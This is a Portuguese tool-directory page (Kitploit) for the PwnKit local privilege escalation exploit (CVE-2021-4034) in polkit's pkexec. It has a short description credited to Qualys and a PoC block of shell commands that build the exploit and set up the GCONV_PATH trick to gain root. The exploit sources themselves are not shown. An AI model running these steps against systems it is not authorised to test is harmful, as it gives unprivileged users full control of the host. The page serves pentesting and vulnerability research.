Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
PwnKit-Vulnerability_CVE-2021-4034 — PwnKit - Vulnerabilidade de Escalação Local de Privilégios Descoberta no pkexec do polkit (CVE-2021-4034) | Kitploit
Ferramentas/GitHubGitHub/tw-d/pwnkit-vulnerability_cve-2021-4034
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoExploração de Binários
GitHubtw-d/pwnkit-vulnerability_cve-2021-4034

PwnKit-Vulnerability_CVE-2021-4034

PwnKit - Vulnerabilidade de Escalação Local de Privilégios Descoberta no pkexec do polkit (CVE-2021-4034)

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
7há 4 anosAinda não revisado

Vulnerabilidade PwnKit - Escalação de Privilégio Local

  • Título: Vulnerabilidade PwnKit - Escalação de Privilégio Local
  • Alvo: Linux
  • Categoria: Execução
  • Créditos: Equipe de Pesquisa Qualys

Descrição

A Equipe de Pesquisa Qualys descobriu uma vulnerabilidade de corrupção de memória no pkexec do polkit, um programa SUID-root instalado por padrão em todas as principais distribuições Linux. Essa vulnerabilidade facilmente explorável permite que qualquer usuário sem privilégios obtenha privilégios totais de root em um host vulnerável ao explorar essa vulnerabilidade em sua configuração padrão.

PwnKit: Vulnerabilidade de Escalação de Privilégio Local Descoberta no pkexec do polkit (CVE-2021-4034)

Testado em

Ubuntu 20.04.3 LTS x86_64

Versão do pkexec 0.105

PoC

mkdir /tmp/pwnkit_lpe/
gcc -shared -o /tmp/pwnkit_lpe/pwnkit.so -fPIC ./library.c
gcc ./exploit.c -o /tmp/pwnkit_lpe/pwnkit
echo "module UTF-8// PWNKIT// pwnkit 1" > /tmp/pwnkit_lpe/gconv-modules
mkdir -p "/tmp/pwnkit_lpe/GCONV_PATH=."
cp /usr/bin/true "/tmp/pwnkit_lpe/GCONV_PATH=./pwnkit.so:."
cd /tmp/pwnkit_lpe/
./pwnkit
Baixar ferramenta